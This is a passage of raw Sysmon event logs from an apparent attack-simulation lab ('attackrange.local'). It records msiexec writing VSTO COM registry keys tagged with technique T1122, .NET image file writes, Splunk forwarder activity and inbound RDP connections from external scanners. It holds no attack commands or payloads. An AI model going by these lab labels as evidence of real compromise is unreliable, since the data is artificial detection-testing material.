Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{A249E9F6-5B28-4ED1-8AF0-C9B9C5195486}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{760681E7-B985-41CE-BCBE-2985A1DFC61C}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{A37BBB42-E8C1-4E09-B9CA-F009CE620C08}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{274C2936-A842-45f3-A457-FB4BA4ED1BA2}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{4E3C66D5-58D4-491E-A7D4-64AF99AF6E8B}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{99D651D7-5F7C-470E-8A3B-774D5D9536AC}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{83081C08-382C-4ED4-ACCF-DCBECA021010}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:07.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\InprocServer32\(Default)c:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll 23542300x800000000000000049965Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:07.673{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51820A333DE84C0B94560DFBD3304347,SHA256=BED6CFF121ECF7E1A3CF2D3B0DB721CD7CFBDEA05A025E862D9D7A227C2B3A51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049964Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:07.657{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=191CE590C720D29650065461142F66D9,SHA256=4D7D0C6F561344C2E2685176ECD1EEE87D4670B26B442197594AFBCD4FA3B5D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\13TOZAELWQ\System.Numerics.ni.dll.auxMD5=F3C267CE9D1C3FB6394036F4E7D8E785,SHA256=A32A8CDFBDC610D9D6F3973CBF9D2DD972EDA72B86EF870D3A235737A6429578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\13TOZAELWQ\System.Numerics.ni.dllMD5=91E874513E4D5B367AB69CA603378A7C,SHA256=704C43518065008070ADC26CDA82847024C7C543FA22971D67EEBDEB9528C966,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0YWQ59HI7D\System.Xml.ni.dll.auxMD5=369EFABDD4D345DD17D7F6E96CCD5E41,SHA256=793116A843DC9D67DE87EC0A2ABF11E47A922664B267410098AD7B65AD4430D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0YWQ59HI7D\System.Xml.ni.dllMD5=B08D3457D316715E513E092A4E1F1B22,SHA256=A679587BF2CAC9D31CDDB246811E683C3F8C5237A7E497EC44ACEEBECE5BB901,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0X54ME6ANH\System.Windows.Forms.ni.dll.auxMD5=4617D052309AFAEF26D5F4D8D4E23AE7,SHA256=0540CD44C52538002758AB0338A2DCFF1C1A02C362FE580545905B1106C75FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0X54ME6ANH\System.Windows.Forms.ni.dllMD5=1473B7ACF38D8269436DADE7A3A8C5A1,SHA256=9424F4B954C713E8D9562D1809B029DA51618BF6436C9D8B8CF704E354D034CC,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:06.703{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-13754-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000072632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.469{A7A01FEF-EB88-607E-A40B-00000000BB01}41164252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000072631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0VFIRUF5ZE\System.Numerics.ni.dll.auxMD5=B112B901DBE457D5C44431DEF8018CE7,SHA256=E8A9B868DAAA55B69C61BE12D2C8D3EA8BB1F99EB970230BB6A867B65586B41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0VFIRUF5ZE\System.Numerics.ni.dllMD5=3C15EEC6D52A4674FE204A7E3610D46E,SHA256=95EBC4E4BF44CE09D29EC4505D7B8548DA661278D4DF53F887CC357557F45A80,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0QG8HSQLNT\System.ni.dll.auxMD5=84B8ACC5B13C06E48410687ADC7579D0,SHA256=CB2EC2B2788E5069BB12B9308159586E291BDF30E214CEF871EA1E6B2BEBB118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0QG8HSQLNT\System.ni.dllMD5=07887F94F904CF7FC14E9019CA4DA2BD,SHA256=200501E0564697E7A0FC680722FA4FEDADB9D012D65E7B0AA2080EF94FDDED43,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000072627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB88-607E-A40B-00000000BB01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB88-607E-A40B-00000000BB01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB88-607E-A40B-00000000BB01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.314{A7A01FEF-EB88-607E-A40B-00000000BB01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.313{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8917D89817209F91F4715075A0D6ACF3,SHA256=1580D047A36D889725D638EDA34E07E58B2CF46B7A530BC0DC2369E35FABA129,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0OA7EB1HBU\System.ni.dll.auxMD5=9B60B2BBB90F47837198E6E98D82A4A6,SHA256=CF985A3477DD0F499F52050F169ACD88D7F2A767641C25774428BB2755123181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\0OA7EB1HBU\System.ni.dllMD5=81C5B20AF92CE8DA61786746DFBBDA67,SHA256=0EC73A4C7D61C98547AAB5B48244022F241D02B1EA7030163D13F9E038D6F96D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049968Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:08.688{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A9CB1507891B4D1B31E396A72FE7A18,SHA256=A7F320507E52CB9F060394BCBECB83498FE4E18A6162BD69245957F1075CEAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049967Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:05.859{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52507-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049966Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:05.264{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49602-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000072662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1GMLPJ6UVG\System.Windows.Forms.ni.dll.auxMD5=EF3404CCFC20B97E804E0921508A9D33,SHA256=96FC2BED83705325F3FB0EBD088F15F4B90203B3525DA008C76F09F3F931A533,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.938{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1GMLPJ6UVG\System.Windows.Forms.ni.dllMD5=089EC05F8A337F413F5E95DEB1BCBD99,SHA256=DCA25114BD4BFDC0692778471FA8AF3CEC539D4DD8CE5F0596C5AFCA04A27303,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.450{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58251-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:08.027{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55746-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.532{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1AMJ6XH9ZS\System.Xml.ni.dll.auxMD5=D29538F54E146DACA6A1D7E68B48829A,SHA256=D472E44502185F6EFA8EF2F24B7D25DF4EF31AA7229841672DD34F78B2A1242B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.532{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\1AMJ6XH9ZS\System.Xml.ni.dllMD5=FE982F628A5787029F86C592E37326C3,SHA256=3067EB0023C9EF9AA2101FC0153CF6ADFF4EDD956EEE6028F80673439B5E391A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\18ATSMREB9\Microsoft.CSharp.ni.dll.auxMD5=BCCA60143E9395CBD98ABC97FAF648D1,SHA256=799DD94DC299F621AF5D70AC9D47731415435028A5A9B625D44C5611C77D14DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB89-607E-A50B-00000000BB01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:09.329{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\